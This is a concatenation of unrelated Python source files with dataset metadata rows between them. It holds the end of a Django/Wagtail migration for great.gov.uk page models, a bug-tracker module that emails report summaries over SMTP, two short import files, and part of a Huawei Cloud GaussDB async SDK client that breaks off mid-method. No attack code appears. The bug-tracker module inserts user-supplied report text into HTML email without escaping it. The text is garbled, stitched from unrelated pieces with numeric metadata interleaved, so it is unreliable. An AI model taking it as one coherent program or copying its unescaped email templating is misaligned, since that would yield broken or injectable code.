migrations.CreateModel(
name='ContactUsGuidancePages',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
],
options={
'abstract': False,
},
bases=(core.models.ExclusivePageMixin, 'wagtailcore.page'),
),
migrations.CreateModel(
name='CountryGuidePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True)),
('landing_page_title', models.CharField(max_length=255)),
('section_one_heading', models.CharField(max_length=50)),
('section_one_content', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
('selling_point_one_heading', models.CharField(max_length=255)),
('selling_point_one_content', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
('selling_point_two_heading', models.CharField(blank=True, max_length=255, null=True)),
('selling_point_two_content', core.model_fields.MarkdownField(blank=True, null=True, validators=[core.validators.slug_hyperlinks])),
('selling_point_three_heading', models.CharField(blank=True, max_length=255, null=True)),
('selling_point_three_content', core.model_fields.MarkdownField(blank=True, null=True, validators=[core.validators.slug_hyperlinks])),
('section_two_heading', models.CharField(max_length=255)),
('section_two_content', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
('related_content_heading', models.CharField(max_length=255)),
('related_content_intro', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
('hero_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='SuperregionPage',
fields=[
('topiclandingpage_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='export_readiness.TopicLandingPage')),
],
options={
'abstract': False,
},
bases=('export_readiness.topiclandingpage',),
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_one_teaser',
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_one_title',
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_one_url',
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_three_teaser',
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_three_title',
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_three_url',
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_two_teaser',
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_two_title',
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_two_url',
),
migrations.AddField(
model_name='articlepage',
name='related_page_one',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='articlepage',
name='related_page_three',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='articlepage',
name='related_page_two',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='campaignpage',
name='related_page_one',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='campaignpage',
name='related_page_three',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='campaignpage',
name='related_page_two',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='countryguidepage',
name='related_page_one',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='countryguidepage',
name='related_page_three',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='countryguidepage',
name='related_page_two',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='countryguidepage',
name='selling_point_one_icon',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image'),
),
migrations.AddField(
model_name='countryguidepage',
name='selling_point_three_icon',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image'),
),
migrations.AddField(
model_name='countryguidepage',
name='selling_point_two_icon',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image'),
),
migrations.CreateModel(
name='SitePolicyPages',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
],
options={
'abstract': False,
},
bases=(core.models.ExclusivePageMixin, 'wagtailcore.page'),
),
migrations.AlterField(
model_name='performancedashboardnotespage',
name='body',
field=core.model_fields.MarkdownField(help_text='Please include an h1 in this field e.g. # Heading level 1', validators=[core.validators.slug_hyperlinks]),
),
migrations.AlterField(
model_name='performancedashboardpage',
name='product_link',
field=models.TextField(choices=[('https://www.great.gov.uk', 'Great.gov.uk'), ('https://selling-online-overseas.export.great.gov.uk', 'Selling Online Overseas'), ('https://www.great.gov.uk/export-opportunities/', 'Export Opportunities'), ('https://www.great.gov.uk/find-a-buyer/', 'Business Profiles'), ('https://invest.great.gov.uk', 'Invest in Great Britain')], help_text='The slug and page heading are inferred from the product link', unique=True),
),
migrations.CreateModel(
name='EUExitFormPages',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
],
options={
'abstract': False,
},
bases=(core.models.ExclusivePageMixin, 'wagtailcore.page'),
),
migrations.CreateModel(
name='AllContactPagesPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
],
options={
'verbose_name': 'Forms',
},
bases=(core.models.ExclusivePageMixin, 'wagtailcore.page'),
),
migrations.AlterField(
model_name='articlelistingpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='articlepage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='campaignpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='countryguidepage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='euexitdomesticformpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='euexitformsuccesspage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='euexitinternationalformpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='exportreadinessapp',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='getfinancepage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='homepage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='performancedashboardnotespage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='performancedashboardpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='privacyandcookiespage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='termsandconditionspage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='topiclandingpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AddField(
model_name='homepage',
name='banner_content',
field=core.model_fields.MarkdownField(default='', validators=[core.validators.slug_hyperlinks]),
preserve_default=False,
),
migrations.AddField(
model_name='homepage',
name='banner_label',
field=models.CharField(blank=True, max_length=50, null=True),
),
]
| 66.866541
| 1,037
| 0.644759
| 3,571
| 35,573
| 6.197984
| 0.078969
| 0.076582
| 0.046989
| 0.046989
| 0.842498
| 0.834455
| 0.811142
| 0.805404
| 0.794831
| 0.758641
| 0
| 0.017778
| 0.209372
| 35,573
| 531
| 1,038
| 66.992467
| 0.769173
| 0.00194
| 0
| 0.799235
| 1
| 0
| 0.334723
| 0.081575
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.001912
| 0.013384
| 0
| 0.021033
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e7df70c258915d7e843436756251798bf210779e
| 5,689
|
py
|
Python
|
BugTracker-main/sendmail.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
BugTracker-main/sendmail.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
BugTracker-main/sendmail.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from config import app
# Sending confirmation email to the reporter
class ReporterSendMail:
def __init__(self, recipient_email, system, severity, steps, message):
# Email and password for your SMTP server
email = app.config['SMTP_EMAIL']
password = app.config['SMTP_PASSWORD']
subject = 'Thanks for reporting the bug'
# The email needs to be written in HTML first then pure text for complete compatibility
messageHTML = f'<table style="height: 40px; border-color: black; margin-left: auto; margin-right: auto;" width="1109"><tbody><tr><td style="width: 1099px; text-align: center;"><h1>Thanks for reporting the bug</h1></td></tr></tbody></table><h2> </h2><h2>Summary of your report:</h2><table style="height: 196px; width: 927px; border-color: black; margin-left: auto; margin-right: auto;"><tbody><tr style="height: 30px;"><td style="height: 30px;"><div><h3>System</h3></div></td><td style="width: 212.133px; height: 30px;"><h3> {system}</h3></td></tr><tr style="height: 27px;"><td style="width: 226.867px; height: 27px;"><div><h3>Severity</h3></div></td><td style="width: 212.133px; height: 27px;"><h3> {severity}</h3></td></tr><tr style="height: 122.433px;"><td style="width: 226.867px; height: 122.433px;"><div><h3>Steps to reproduce</h3></div></td><td style="width: 212.133px; height: 122.433px;"><h3> {steps}</h3></td></tr><tr style="height: 98px;"><td style="width: 226.867px; height: 98px;"><h3>Message</h3></td><td style="width: 212.133px; height: 98px;"><h3> {message}</h3></td></tr></tbody></table><p> </p>'
messagePlain = f"Thanks for reporting the bug\nSummary of your report:\nSystem {system}\nSeverity {severity}\nSteps to reproduce {steps}\nMessage {message}\nPlease enable HTML to see the styled message."
# We define the MIME module and say that there is an alternative for the HTML email for it to use it
msg = MIMEMultipart('alternative')
# Defining email, recipient email and subject for the MIME module
msg['From'] = email
msg['To'] = recipient_email
msg['Subject'] = subject
# Then we attach our message both in plain text and html
msg.attach(MIMEText(messagePlain, 'plain'))
msg.attach(MIMEText(messageHTML, 'html'))
# We define our SMTP server (using gmail here you need to enable less secure apps to use it)
server = smtplib.SMTP(app.config['SMTP_HOST'], app.config['SMTP_PORT'])
# Starting a secure TLS connection and logining in
server.starttls()
server.login(email, password)
# turning the MIME message into string and finally sending the email then closing the connection
text = msg.as_string()
server.sendmail(email, recipient_email, text)
server.quit()
class AdminSendMail:
def __init__(self, recipient_email, system, severity, steps, message):
# Email and password for your SMTP server
email = app.config['SMTP_EMAIL']
password = app.config['SMTP_PASSWORD']
subject = 'A new bug has been reported'
# The email needs to be written in HTML first then pure text for complete compatibility
messageHTML = f'<table style="height: 40px; border-color: black; margin-left: auto; margin-right: auto;" width="1109"><tbody><tr><td style="width: 1099px; text-align: center;"><h1>Thanks for reporting the bug</h1></td></tr></tbody></table><h2> </h2><h2>Summary of the report:</h2><table style="height: 196px; width: 927px; border-color: black; margin-left: auto; margin-right: auto;"><tbody><tr style="height: 30px;"><td style="height: 30px;"><div><h3>System</h3></div></td><td style="width: 212.133px; height: 30px;"><h3> {system}</h3></td></tr><tr style="height: 27px;"><td style="width: 226.867px; height: 27px;"><div><h3>Severity</h3></div></td><td style="width: 212.133px; height: 27px;"><h3> {severity}</h3></td></tr><tr style="height: 122.433px;"><td style="width: 226.867px; height: 122.433px;"><div><h3>Steps to reproduce</h3></div></td><td style="width: 212.133px; height: 122.433px;"><h3> {steps}</h3></td></tr><tr style="height: 98px;"><td style="width: 226.867px; height: 98px;"><h3>Message</h3></td><td style="width: 212.133px; height: 98px;"><h3> {message}</h3></td></tr></tbody></table><p> </p>'
messagePlain = f"Thanks for reporting the bug\nSummary of your report:\nSystem {system}\nSeverity {severity}\nSteps to reproduce {steps}\nMessage {message}\nPlease enable HTML to see the styled message."
# We define the MIME module and say that there is an alternative for the HTML email for it to use it
msg = MIMEMultipart('alternative')
# Defining email, recipient email and subject for the MIME module
msg['From'] = email
msg['To'] = app.config['ADMIN_EMAIL']
msg['Subject'] = subject
# Then we attach our message both in plain text and html
msg.attach(MIMEText(messagePlain, 'plain'))
msg.attach(MIMEText(messageHTML, 'html'))
# We define our SMTP server (using gmail here you need to enable less secure apps to use it)
server = smtplib.SMTP(app.config['SMTP_HOST'], app.config['SMTP_PORT'])
# Starting a secure TLS connection and logining in
server.starttls()
server.login(email, password)
# turning the MIME message into string and finally sending the email then closing the connection
text = msg.as_string()
server.sendmail(email, app.config['ADMIN_EMAIL'], text)
server.quit()
| 87.523077
| 1,150
| 0.675163
| 829
| 5,689
| 4.604343
| 0.176116
| 0.03301
| 0.050301
| 0.029342
| 0.923238
| 0.91695
| 0.91695
| 0.91695
| 0.91695
| 0.91695
| 0
| 0.049028
| 0.168219
| 5,689
| 64
| 1,151
| 88.890625
| 0.757608
| 0.210933
| 0
| 0.666667
| 0
| 0.095238
| 0.636099
| 0.206218
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0.095238
| 0.095238
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
8210502e1752e0803b33f19665f590cd658aa20b
| 213
|
py
|
Python
|
store_item_models/store_item_uses/models.py
|
reimibeta/django-store-item-models
|
0be5fad0df0b3ebc7283fc6369f0e769a4743987
|
[
"Apache-2.0"
] | null | null | null |
store_item_models/store_item_uses/models.py
|
reimibeta/django-store-item-models
|
0be5fad0df0b3ebc7283fc6369f0e769a4743987
|
[
"Apache-2.0"
] | null | null | null |
store_item_models/store_item_uses/models.py
|
reimibeta/django-store-item-models
|
0be5fad0df0b3ebc7283fc6369f0e769a4743987
|
[
"Apache-2.0"
] | null | null | null |
# item use
from store_item_models.store_item_uses.class_models.store_item_use import StoreItemUse
# item use stock
from store_item_models.store_item_uses.class_models.store_item_use_stock import StoreItemUseStock
| 42.6
| 97
| 0.892019
| 34
| 213
| 5.147059
| 0.323529
| 0.308571
| 0.342857
| 0.217143
| 0.628571
| 0.628571
| 0.628571
| 0.628571
| 0.628571
| 0.628571
| 0
| 0
| 0.070423
| 213
| 4
| 98
| 53.25
| 0.883838
| 0.107981
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
415c027dc1277d4f4c87bdbcc810f59cf45c0689
| 54
|
py
|
Python
|
convokit/emotion/__init__.py
|
calebchiam/cs6742-fork
|
14dc879849ada4c08059c21f8b9721c0c3dbcebf
|
[
"MIT"
] | null | null | null |
convokit/emotion/__init__.py
|
calebchiam/cs6742-fork
|
14dc879849ada4c08059c21f8b9721c0c3dbcebf
|
[
"MIT"
] | null | null | null |
convokit/emotion/__init__.py
|
calebchiam/cs6742-fork
|
14dc879849ada4c08059c21f8b9721c0c3dbcebf
|
[
"MIT"
] | 1
|
2020-01-17T17:27:16.000Z
|
2020-01-17T17:27:16.000Z
|
from .emotion import *
from .emotion import EmoTracker
| 27
| 31
| 0.814815
| 7
| 54
| 6.285714
| 0.571429
| 0.5
| 0.772727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12963
| 54
| 2
| 31
| 27
| 0.93617
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
41b26753c3bcb443658c19ec29606b3106462eab
| 68,630
|
py
|
Python
|
huaweicloud-sdk-gaussdb/huaweicloudsdkgaussdb/v3/gaussdb_async_client.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 64
|
2020-06-12T07:05:07.000Z
|
2022-03-30T03:32:50.000Z
|
huaweicloud-sdk-gaussdb/huaweicloudsdkgaussdb/v3/gaussdb_async_client.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 11
|
2020-07-06T07:56:54.000Z
|
2022-01-11T11:14:40.000Z
|
huaweicloud-sdk-gaussdb/huaweicloudsdkgaussdb/v3/gaussdb_async_client.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 24
|
2020-06-08T11:42:13.000Z
|
2022-03-04T06:44:08.000Z
|
# coding: utf-8
from __future__ import absolute_import
import datetime
import re
import importlib
import six
from huaweicloudsdkcore.client import Client, ClientBuilder
from huaweicloudsdkcore.exceptions import exceptions
from huaweicloudsdkcore.utils import http_utils
from huaweicloudsdkcore.sdk_stream_request import SdkStreamRequest
class GaussDBAsyncClient(Client):
"""
:param configuration: .Configuration object for this client
:param pool_threads: The number of threads to use for async requests
to the API. More threads means more concurrent API requests.
"""
PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
NATIVE_TYPES_MAPPING = {
'int': int,
'long': int if six.PY3 else long,
'float': float,
'str': str,
'bool': bool,
'date': datetime.date,
'datetime': datetime.datetime,
'object': object,
}
def __init__(self):
super(GaussDBAsyncClient, self).__init__()
self.model_package = importlib.import_module("huaweicloudsdkgaussdb.v3.model")
self.preset_headers = {'User-Agent': 'HuaweiCloud-SDK-Python'}
@classmethod
def new_builder(cls, clazz=None):
if clazz is None:
return ClientBuilder(cls)
if clazz.__name__ != "GaussDBClient":
raise TypeError("client type error, support client type is GaussDBClient")
return ClientBuilder(clazz)
def change_gauss_my_sql_instance_specification_async(self, request):
"""变更实例规格
变更数据库实例的规格。
:param ChangeGaussMySqlInstanceSpecificationRequest request
:return: ChangeGaussMySqlInstanceSpecificationResponse
"""
return self.change_gauss_my_sql_instance_specification_with_http_info(request)
def change_gauss_my_sql_instance_specification_with_http_info(self, request):
"""变更实例规格
变更数据库实例的规格。
:param ChangeGaussMySqlInstanceSpecificationRequest request
:return: ChangeGaussMySqlInstanceSpecificationResponse
"""
all_params = ['instance_id', 'mysql_change_specification_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/action',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ChangeGaussMySqlInstanceSpecificationResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def create_gauss_my_sql_backup_async(self, request):
"""创建手动备份
创建手动备份
:param CreateGaussMySqlBackupRequest request
:return: CreateGaussMySqlBackupResponse
"""
return self.create_gauss_my_sql_backup_with_http_info(request)
def create_gauss_my_sql_backup_with_http_info(self, request):
"""创建手动备份
创建手动备份
:param CreateGaussMySqlBackupRequest request
:return: CreateGaussMySqlBackupResponse
"""
all_params = ['mysql_create_backup_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/backups/create',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='CreateGaussMySqlBackupResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def create_gauss_my_sql_instance_async(self, request):
"""创建数据库实例
创建云数据库 GaussDB(for MySQL)实例。
:param CreateGaussMySqlInstanceRequest request
:return: CreateGaussMySqlInstanceResponse
"""
return self.create_gauss_my_sql_instance_with_http_info(request)
def create_gauss_my_sql_instance_with_http_info(self, request):
"""创建数据库实例
创建云数据库 GaussDB(for MySQL)实例。
:param CreateGaussMySqlInstanceRequest request
:return: CreateGaussMySqlInstanceResponse
"""
all_params = ['create_instance_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='CreateGaussMySqlInstanceResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def create_gauss_my_sql_proxy_async(self, request):
"""开启数据库代理
开启数据库代理,只支持ELB模式。
:param CreateGaussMySqlProxyRequest request
:return: CreateGaussMySqlProxyResponse
"""
return self.create_gauss_my_sql_proxy_with_http_info(request)
def create_gauss_my_sql_proxy_with_http_info(self, request):
"""开启数据库代理
开启数据库代理,只支持ELB模式。
:param CreateGaussMySqlProxyRequest request
:return: CreateGaussMySqlProxyResponse
"""
all_params = ['instance_id', 'x_language', 'create_mysql_proxy_request']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
